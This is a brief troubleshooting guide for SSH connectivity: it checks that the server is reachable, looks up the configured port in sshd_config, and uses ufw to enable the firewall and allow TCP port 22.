First make sure that the SSH server is reachable (ping it, unless ICMP is blocked). Next make sure the port is open on the SSH server's firewall. The most common port used for SSH is 22, but any other port could be configured, so check the Port value in sshd_config.

Using ufw you can make sure that the port is opened. First you have to enable ufw using the following command:

sudo ufw enable

Now that the firewall is enable you can use the following command to allow access on the TCP port of 22. This number can be changed if you are using a non standard port.

sudo ufw allow 22/tcp